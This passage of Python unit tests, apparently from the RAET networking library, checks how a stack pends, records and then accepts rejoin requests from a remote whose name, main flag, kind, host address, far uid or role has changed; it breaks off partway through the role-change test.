    # Scenario L1: beta rejoins with every attribute unchanged (SameAll).
    # Even with the strictest settings (immutable alpha, auto=never) the
    # join must be accepted and alpha's remote left untouched.
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always (Use never as most strict)
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # NOTE: .values()[0] relies on an indexable odict (ioflo), not a plain dict
    alphaRemote = alpha.remotes.values()[0]
    betaRemote = beta.remotes.values()[0]
    # Mutable: Either (use No as more strict)
    self.assertIs(alpha.mutable, None)
    alpha.keep.auto = raeting.AutoMode.never.value
    # Name: Old
    # Main: Old
    # Kind: Old
    # RHA: Old
    # Nuid: Old
    # Fuid: Old
    # Leid: Old
    # Reid: Old
    # Role: Old
    # Keys: Old
    # Sameness: SameAll
    keep = self.copyData(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, No change
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertIs(stack.mutable, None)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    # Assert alphaRemote isn't modified
    self.assertTrue(self.sameAll(alphaRemote, keep))
    # Second completed join on each side (first was in bootstrapJoinedRemotes)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewName(self):
    '''
    Test mutable joinent pend non-vacuous join with an updated name (M1)
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewName.__doc__))
    # Scenario M1: alpha (joinent, mutable, auto=never) sees beta rejoin under
    # a new name. The join is pended, the renamed remote is dumped under the
    # new name, then the pended transaction is accepted and completes.
    # Status: Pending
    # Mode: Never
    alpha, beta = self.bootstrapStacks()
    alpha.keep.auto = raeting.AutoMode.never.value
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0, # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    # Cross-link so each side's far uid (fuid) points at the other's near uid
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    alpha.keep.pendRemote(alphaRemote)
    # Ensure remote status is Pending
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: New
    oldName = beta.name
    newName = '{0}_new'.format(oldName)
    beta.name = newName
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Pend, Dump
    # One open transaction per side: the join is pended, not yet complete
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.name, newName)
    self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
    self.assertIs(betaRemote.acceptance, None)
    # Check remote dump: old-name entry is gone, new-name entry is pending
    remoteData = alpha.keep.loadRemoteData(oldName)
    self.assertIs(remoteData, None)
    remoteData = alpha.keep.loadRemoteData(newName)
    self.assertIsNot(remoteData, None)
    self.assertEqual(remoteData['name'], beta.name) # new value
    self.assertEqual(remoteData['role'], beta.local.role)
    self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
    beta.mutable = True
    # Accept the transaction
    alpha.keep.acceptRemote(alphaRemote)
    self.serviceStacks([alpha, beta], duration=3.0)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertTrue(stack.mutable)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 1)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(oldName)
    self.assertIs(remoteData, None)
    remoteData = alpha.keep.loadRemoteData(newName)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewMain(self):
    '''
    Test mutable joinent pend non-vacuous join with an updated main (M2)
    '''
    # FIX: was printing testJoinentNonVacuousImmutableRejectNewMain.__doc__
    # (copy-paste from another test); print this test's own docstring.
    console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewMain.__doc__))
    # Scenario M2: alpha (joinent, mutable, auto=never) sees beta rejoin with
    # main flipped to True. The join is pended and the updated main is dumped;
    # accepting the pended transaction then completes the join.
    # Status: Pending
    # Mode: Never
    alpha, beta = self.bootstrapStacks()
    alpha.keep.auto = raeting.AutoMode.never.value
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0, # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    # Cross-link so each side's far uid (fuid) points at the other's near uid
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    alpha.keep.pendRemote(alphaRemote)
    # Ensure remote status is Pending
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: Either
    # Main: New
    oldMain = None
    newMain = True
    self.assertIs(beta.main, oldMain)
    beta.main = newMain
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Pend, Dump
    # One open transaction per side: the join is pended, not yet complete
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.main, newMain)
    self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
    self.assertIs(betaRemote.acceptance, None)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIsNot(remoteData, None)
    self.assertEqual(remoteData['main'], beta.main) # new value
    self.assertEqual(remoteData['role'], beta.local.role)
    self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
    beta.mutable = True
    # Accept the transaction
    alpha.keep.acceptRemote(alphaRemote)
    self.serviceStacks([alpha, beta], duration=3.0)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertTrue(stack.mutable)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 1)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewKind(self):
    '''
    Test mutable joinent pend non-vacuous join with an updated kind (M3)
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewKind.__doc__))
    # Scenario M3: alpha (joinent, mutable, auto=never) sees beta rejoin with a
    # changed application kind. The join is pended and the new kind dumped;
    # accepting the pended transaction then completes the join.
    # Status: Pending
    # Mode: Never
    alpha, beta = self.bootstrapStacks()
    alpha.keep.auto = raeting.AutoMode.never.value
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0, # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    # Cross-link so each side's far uid (fuid) points at the other's near uid
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    alpha.keep.pendRemote(alphaRemote)
    # Ensure remote status is Pending
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: Either
    # Main: Either
    # Kind: New
    oldKind = beta.kind
    newKind = 33  # arbitrary kind value distinct from the bootstrap default
    self.assertNotEqual(oldKind, newKind)
    beta.kind = newKind
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Pend, Dump
    # One open transaction per side: the join is pended, not yet complete
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.kind, newKind)
    self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
    self.assertIs(betaRemote.acceptance, None)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIsNot(remoteData, None)
    self.assertEqual(remoteData['kind'], beta.kind) # new value
    self.assertEqual(remoteData['role'], beta.local.role)
    self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
    beta.mutable = True
    # Accept the transaction
    alpha.keep.acceptRemote(alphaRemote)
    self.serviceStacks([alpha, beta], duration=3.0)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertTrue(stack.mutable)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 1)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewRha(self):
    '''
    Test mutable joinent pend non-vacuous join with an updated remote host address (M4)
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewRha.__doc__))
    # Scenario M4: alpha (joinent, mutable, auto=never) knows beta at a stale
    # host address; beta rejoins from its real address. The join is pended and
    # the new address dumped; accepting the transaction completes the join.
    # Status: Pending
    # Mode: Never
    alpha, beta = self.bootstrapStacks()
    alpha.keep.auto = raeting.AutoMode.never.value
    # Mutable: Yes
    alpha.mutable = True
    # Simulate: alpha already know beta with ha=('127.0.0.1', 7532)
    # beta connects with ha=('127.0.0.1', 7531)
    oldHa = (beta.local.ha[0], 7532)
    newHa = (beta.local.ha[0], beta.local.ha[1])
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0, # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=oldHa,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    # Cross-link so each side's far uid (fuid) points at the other's near uid
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    alpha.keep.pendRemote(alphaRemote)
    # Ensure remote status is Pending
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: Either
    # Main: Either
    # Appl: Either
    # RHA: New: alpha remote ha is set to (127.0.0.1, 7532),
    #   new ha received from beta is (127.0.0.1, 7531)
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    self.assertEqual(alphaRemote.ha, oldHa)
    self.assertEqual(beta.local.ha, newHa)
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Pend, Dump
    # One open transaction per side: the join is pended, not yet complete
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.ha, newHa)
    self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
    self.assertIs(betaRemote.acceptance, None)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIsNot(remoteData, None)
    self.assertEqual(tuple(remoteData['ha']), beta.local.ha) # new value
    self.assertEqual(remoteData['role'], beta.local.role)
    self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
    # FIX: these two assertions previously checked the stale roleData loaded
    # above instead of the freshly loaded remoteData (as every sibling test
    # does in its "Check remote dump" section).
    self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
    beta.mutable = True
    # Accept the transaction
    alpha.keep.acceptRemote(alphaRemote)
    self.serviceStacks([alpha, beta], duration=3.0)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertTrue(stack.mutable)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 1)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewFuid(self):
    '''
    Test mutable joinent pend non-vacuous join with an updated fuid (M5)
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewFuid.__doc__))
    # Scenario M5: alpha (joinent, mutable, auto=never) knows beta under a
    # stale far uid (fuid); beta rejoins with its real uid. The join is pended
    # and the new fuid dumped; accepting the transaction completes the join.
    # Status: Pending
    # Mode: Never
    alpha, beta = self.bootstrapStacks()
    alpha.keep.auto = raeting.AutoMode.never.value
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0, # always 0 for join
                                       ha=alpha.local.ha)
    # Simulate: alpha already know beta with fuid=33
    # beta connects with a new fuid=newFuid
    oldFuid = 33
    newFuid = betaRemote.nuid
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=oldFuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    # Cross-link so each side's far uid (fuid) points at the other's near uid
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    alpha.keep.pendRemote(alphaRemote)
    # Ensure remote status is Pending
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: New: alphaRemote has uid=33 that is 'old', betaRemote has uid=2
    # Leid: Old
    # Reid: New
    # Role: Either
    # Keys: Either
    # Sameness: Not sameall
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Pend, Dump
    # One open transaction per side: the join is pended, not yet complete
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.fuid, newFuid)
    self.assertIs(alphaRemote.acceptance, raeting.Acceptance.pending.value)
    self.assertIs(betaRemote.acceptance, None)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIsNot(remoteData, None)
    self.assertEqual(remoteData['fuid'], betaRemote.nuid) # new value
    self.assertEqual(remoteData['role'], beta.local.role)
    self.assertEqual(remoteData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Allow beta to modify it's remote estate: set proper name and role for alpha remote estate on accept
    beta.mutable = True
    # Accept the transaction
    alpha.keep.acceptRemote(alphaRemote)
    self.serviceStacks([alpha, beta], duration=3.0)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        self.assertTrue(stack.mutable)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 1)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 1)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousPendingPendNewRole(self):
    '''
    Test mutable joinent pend non-vacuous join with an updated role (M6)
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousPendingPendNewRole.__doc__))
    # Scenario M6: alpha (joinent, mutable, auto=never) sees beta rejoin under
    # a new role name. The join is pended and the new role dumped; accepting
    # the pended transaction then completes the join.
    # Status: Pending
    # Mode: Never
    alpha, beta = self.bootstrapStacks()
    alpha.keep.auto = raeting.AutoMode.never.value
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0, # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    # Cross-link so each side's far uid (fuid) points at the other's near uid
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    alpha.keep.pendRemote(alphaRemote)
    oldRole = 'beta'
    newRole = 'beta_new'
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: New
    # FIX: was assertIs, which compares string identity and only passed
    # because CPython interns identifier-like literals; value equality is
    # the intended check here.
    self.assertEqual(beta.local.role, oldRole)
